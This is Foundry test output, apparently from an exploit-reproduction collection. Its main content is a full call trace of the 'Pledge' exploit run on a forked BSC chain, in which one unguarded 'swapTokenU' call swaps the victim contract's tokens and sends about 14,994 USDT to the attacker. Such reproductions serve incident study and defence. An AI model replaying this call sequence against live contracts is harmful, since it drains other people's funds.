Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.29s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 674.79ms (2.05ms CPU time)

Ran 1 test for src/test/2024-12/Pledge_exp.sol:Pledge
[PASS] testExploit() (gas: 211825)
Logs:
  Attacker USDT Balance Before exploit: 0.000000000000000000
  Attacker USDT Balance After exploit: 14994.304057738361451515

Traces:
  [277359] Pledge::setUp()
    ├─ [0] VM::createSelectFork("bsc", 44555337 [4.455e7])
    │   └─ ← [Return] 0
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::accesses(0x55d398326f99059fF775485246999027B3197955)
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000017058b35e777da275)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0x55d398326f99059fF775485246999027B3197955, fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [219425] Pledge::testExploit()
    ├─ [3081] 0x55d398326f99059fF775485246999027B3197955::symbol() [staticcall]
    │   └─ ← [Return] "USDT"
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2425] 0x55d398326f99059fF775485246999027B3197955::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker USDT Balance Before exploit", val: 0, decimals: 18)
    ├─ [2583] 0x4E5A19335017D69C986065B21e9dfE7965f84413::balanceOf(0x061944c0f3c2d7DABafB50813Efb05c4e0c952e1) [staticcall]
    │   └─ ← [Return] 989644233342705000000000000 [9.896e26]
    ├─ [167395] 0x061944c0f3c2d7DABafB50813Efb05c4e0c952e1::swapTokenU(989644233342705000000000000 [9.896e26], Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [24674] 0x4E5A19335017D69C986065B21e9dfE7965f84413::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ emit Approval(owner: 0x061944c0f3c2d7DABafB50813Efb05c4e0c952e1, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x25c45c1b32c539302841dfe1f0b49b797478fc53f7d51cd276bb5aa3779261a6: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   ├─ [131583] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(989644233342705000000000000 [9.896e26], 0, [0x4E5A19335017D69C986065B21e9dfE7965f84413, 0x55d398326f99059fF775485246999027B3197955], Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1733246836 [1.733e9])
    │   │   ├─ [20806] 0x4E5A19335017D69C986065B21e9dfE7965f84413::transferFrom(0x061944c0f3c2d7DABafB50813Efb05c4e0c952e1, 0x8b98e36dFF7E5aD41b304FFF2aCf1D3D2368384A, 989644233342705000000000000 [9.896e26])
    │   │   │   ├─ emit Transfer(from: 0x061944c0f3c2d7DABafB50813Efb05c4e0c952e1, to: 0x8b98e36dFF7E5aD41b304FFF2aCf1D3D2368384A, value: 989644233342705000000000000 [9.896e26])
    │   │   │   ├─ emit Approval(owner: 0x061944c0f3c2d7DABafB50813Efb05c4e0c952e1, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665639574395224241302913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x25c45c1b32c539302841dfe1f0b49b797478fc53f7d51cd276bb5aa3779261a6: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffccd62ae9c71564fe2bbefff
    │   │   │   │   @ 0xaaca113440c616e41729c36cb0e2aa6098b5994d003279cea654ca07b07b9f5d: 0x000000000000000000000000000000000000000003329d51638ea9b01d441000 → 0
    │   │   │   │   @ 0xbf0a6cfe12b41d3c9356ebcb8c7be4cc1462bccc9699b2b1ce1387412001a94d: 0x000000000000000000000000000000000000000000004f68ca6d8cd91c600000 → 0x00000000000000000000000000000000000000000332ecba2dfc368939a41000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [2893] 0x8b98e36dFF7E5aD41b304FFF2aCf1D3D2368384A::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 375000000000000000000000 [3.75e23], 15000000000000000000000 [1.5e22], 1733246833 [1.733e9]
    │   │   ├─ [583] 0x4E5A19335017D69C986065B21e9dfE7965f84413::balanceOf(0x8b98e36dFF7E5aD41b304FFF2aCf1D3D2368384A) [staticcall]
    │   │   │   └─ ← [Return] 990019233342705000000000000 [9.9e26]
    │   │   ├─ [96597] 0x8b98e36dFF7E5aD41b304FFF2aCf1D3D2368384A::swap(0, 14994304057738361451515 [1.499e22], Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [27971] 0x55d398326f99059fF775485246999027B3197955::transfer(Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 14994304057738361451515 [1.499e22])
    │   │   │   │   ├─ emit Transfer(from: 0x8b98e36dFF7E5aD41b304FFF2aCf1D3D2368384A, to: Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 14994304057738361451515 [1.499e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x802f96b67955f73c2218a4f0d588f9c5c8e4b11ba4e0b028d604ca4d24391c92: 0x00000000000000000000000000000000000000000000032d26d12e980b600000 → 0x0000000000000000000000000000000000000000000000004f0c0d4efe19cc05
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000032cd7c521490d4633fb
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [583] 0x4E5A19335017D69C986065B21e9dfE7965f84413::balanceOf(0x8b98e36dFF7E5aD41b304FFF2aCf1D3D2368384A) [staticcall]
    │   │   │   │   └─ ← [Return] 990019233342705000000000000 [9.9e26]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x8b98e36dFF7E5aD41b304FFF2aCf1D3D2368384A) [staticcall]
    │   │   │   │   └─ ← [Return] 5695942261638548485 [5.695e18]
    │   │   │   ├─ emit Sync(reserve0: 990019233342705000000000000 [9.9e26], reserve1: 5695942261638548485 [5.695e18])
    │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 989644233342705000000000000 [9.896e26], amount1In: 0, amount0Out: 0, amount1Out: 14994304057738361451515 [1.499e22], to: Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0 → 0x00000000000000000000000000000000004b0000000000000000000000000000
    │   │   │   │   @ 8: 0x674f3f7100000000032d26d12e980b600000000000004f68ca6d8cd91c600000 → 0x674f3f740000000000004f0c0d4efe19cc0500000332ecba2dfc368939a41000
    │   │   │   │   @ 9: 0 → 0x0000000000000000000000000000000000001eb851eb851eb851eb851eb851e9
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 14994304057738361451515 [1.499e22]
    │   │   └─ ← [Stop]
    │   ├─  storage changes:
    │   │   @ 0x25c45c1b32c539302841dfe1f0b49b797478fc53f7d51cd276bb5aa3779261a6: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Stop]
    ├─ [1081] 0x55d398326f99059fF775485246999027B3197955::symbol() [staticcall]
    │   └─ ← [Return] "USDT"
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Pledge: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 14994304057738361451515 [1.499e22]
    ├─ [425] 0x55d398326f99059fF775485246999027B3197955::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker USDT Balance After exploit", val: 14994304057738361451515 [1.499e22], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 818.02ms (7.77ms CPU time)

Ran 2 test suites in 850.82ms (1.49s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
